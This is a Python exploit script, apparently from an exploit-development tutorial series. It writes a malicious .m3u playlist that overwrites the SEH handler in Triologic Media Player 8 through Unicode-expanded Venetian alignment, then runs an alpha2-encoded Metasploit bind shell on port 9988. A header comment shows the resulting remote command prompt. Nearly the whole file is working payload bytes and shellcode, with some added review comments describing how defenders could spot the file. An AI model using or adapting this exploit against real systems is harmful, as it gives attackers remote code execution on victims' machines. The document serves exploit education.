Triologic Media Player 8 (.m3u) SEH Unicode

 

 

 

 

 

 

 

 

 

Created for part five of my exploit development tutorial series, which covers Unicode.

#!/usr/bin/python -w

#-------------------------------------------------------------------------------#
# Exploit: Triologic Media Player 8 (.m3u) SEH Unicode                          #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/                   #
# OS: WinXP PRO SP3                                                             #
# Software: http://download.cnet.com/Triologic-Media-Player/                    #
#           3000-2139_4-10691520.html                                           #
#-------------------------------------------------------------------------------#
# This exploit was created for Part 5 of my Exploit Development tutorial        #
# series - http://www.fuzzysecurity.com/tutorials/expDev/5.html                 #
#-------------------------------------------------------------------------------#
# root@bt:/pentest/alpha2# nc -nv 192.168.111.128 9988                          #
# (UNKNOWN) [192.168.111.128] 9988 (?) open                                     #
# Microsoft Windows XP [Version 5.1.2600]                                       #
# (C) Copyright 1985-2001 Microsoft Corp.                                       #
#                                                                               #
# C:\Documents and Settings\Administrator\Desktop>                              #
#-------------------------------------------------------------------------------#

# Output path, relative to the current working directory.
filename="evil.m3u"

#---------------------SEH-Structure---------------------#
#nSEH => \x41\x71 => 41       INC ECX                   #
#                    0071 00  ADD BYTE PTR DS:[ECX],DH  #
#SEH =>  \xF2\x41 => F2:      PREFIX REPNE:             #
#                    0041 00  ADD BYTE PTR DS:[ECX],AL  #
#-------------------------------------------------------#
#0x004100f2 : pop esi # pop ebx # ret 04 | triomp8.exe  #
#-------------------------------------------------------#
# Four bytes: nSEH ("\x41\x71") immediately followed by the handler
# address ("\xF2\x41"). The table above shows how each pair reads once the
# target expands it to UTF-16 (a NUL after every byte).
SEH = "\x41\x71" + "\xF2\x41"

#-----------------------Alignment-----------------------#
#After we step through nSEH and SEH if look at the dump #
#of the CPU registers we can see several which are close#
#to our shellcode, I chose EBP. Time for some Venetian  #
#Black-Magic alignment...                               #
#-------------------------------------------------------#
# Eleven bytes. Each "\x71" is a Venetian pad byte: together with the NUL
# the UTF-16 expansion inserts it forms a harmless instruction that keeps
# the real opcodes aligned. The two 3-byte immediates become 4-byte
# operands after expansion (the inserted NULs are the missing bytes).
# NOTE(review): 0x11002000 - 0x11001700 is 0x900, not 0x300; the "+300"
# annotation below may be a typo -- confirm.
align = (
"\x55"                      #push EBP
"\x71"                      #Venetian Padding
"\x58"                      #pop EAX
"\x71"                      #Venetian Padding
"\x05\x20\x11"              #add eax,0x11002000  \
"\x71"                      #Venetian Padding     |> +300
"\x2d\x17\x11"              #sub eax,0x11001700  /
"\x71"                      #Venetian Padding
"\x50"                      #push EAX
"\x71"                      #Venetian Padding
"\xC3")                     #RETN

#We need to pad our buffer to the place of our alignment in EAX
# 117 bytes of "\x58" (the same pop EAX byte used in align); the count
# was measured by the author so that the value placed in EAX lands on
# the encoded shellcode -- TODO confirm, the figure is taken as given.
filler = "\x58"*117

#---------------------------------------Shellcode---------------------------------------------#
#root@bt:/pentest/alpha2# msfpayload windows/shell_bind_tcp LPORT=9988 R > bindshell9988.raw  #
#root@bt:/pentest/alpha2# ./alpha2 eax --unicode --uppercase < bindshell9988.raw              #
#---------------------------------------------------------------------------------------------#
# alpha2 output (Unicode, uppercase) of a bind shell on TCP/9988; the
# decoder stub expects EAX to point at itself, which is what align sets up.
# Because the blob is printable uppercase ASCII, a playlist consisting of
# long alphanumeric runs instead of paths/URLs is an obvious anomaly.
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
"AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
"BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
"BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
"KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
"1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
"CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
"JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN"
"IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
"K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
"SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
"WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
"6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
"EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")

# Payload region: 4 + 11 + 117 + len(shellcode) bytes.
boom = SEH + align + filler + shellcode
# 536 bytes of "\x90" precede the nSEH/SEH pair; the trailing "B"s pad boom
# out to exactly 4466 bytes, so the file is always 536 + 4466 = 5002 bytes.
# NOTE(review): str * negative_count yields "" in Python, so if boom ever
# grew past 4466 bytes no padding would be emitted and the layout would
# silently shift.
buffer = "\x90"*536 + boom + "B"*(4466-len(boom))

# Written as a Python 2 str (the "\xNN" escapes above are raw byte
# values; the shebang points at the unversioned interpreter); the handle is
# closed explicitly rather than via a context manager.
# NOTE(review): from a defender's view the artefact is a fixed 5002-byte
# .m3u made almost entirely of 0x90 / "B" filler plus one printable
# uppercase blob, with no playlist entries at all -- trivially
# distinguishable from a real playlist.
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()